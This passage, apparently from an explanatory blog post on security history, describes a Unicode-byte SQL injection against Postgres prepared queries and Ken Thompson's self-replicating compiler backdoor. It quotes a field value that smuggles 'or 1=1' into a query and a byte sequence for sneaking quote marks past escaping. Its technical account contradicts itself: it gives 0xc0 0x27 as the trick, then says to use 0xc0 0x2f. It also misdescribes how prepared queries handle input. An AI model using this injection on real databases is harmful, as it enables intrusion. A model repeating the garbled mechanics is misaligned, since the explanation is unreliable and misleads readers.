But everyone uses prepared queries with Postgres: select * from users u where u.username = $1. This means all the quote marks (and other bad characters) in the $username string are properly escaped: the above bad username would now be bob\' or 1=1;\', and this is not incorrectly parsed. How does the new injection happen? Unicode!

The Unicode escape character for two-byte Unicode sequences is 0xc0 (at least the first three bits must be 110). If this is seen by the Postgres string parser, and the following byte is part of a legitimate two-byte Unicode sequence, then that Unicode character is returned.

But, and here's the bug, if the character following the 0xc0 does not make a legitimate two-byte Unicode sequence, then just the second character is returned.

So what the attackers did was use 0xc0 0x27. This is not a recognized Unicode sequence, and so the character 0x27 is returned.

Which is a single quote mark: '

So now the attackers can insert single quote marks into the data for prepared queries, which means our bad example above works even with prepared queries provided we replace ' with 0xc0 0x2f.

This attack was used on the US Treasury in December 2024. More at slamdunksoftware.substack.com/p/hidden-messages-in-emojis-and-hacking.

Thompson Backdoor

Ken Thompson is one of the original developers of Unix. In his 1983 Turing Award speech, "Reflections on Trusting Trust", he described the following hack:

The Unix login program is modified to allow in someone with a certain userid and password
The C compiler would insert this modification whenever login.c was compiled, so compiling from a clean copy of login.c wouldn't help
The C compiler would also insert modifications whenever it itself was recompiled, so recompiling the C compiler would still leave you with the Trojan in place.

There was one more step: when the compiler was asked to disassemble the Trojaned code, it would show what the code was supposed to be, not what it actually was.

Thompson did implement this as a demo. Nobody really thinks anyone is trying this today.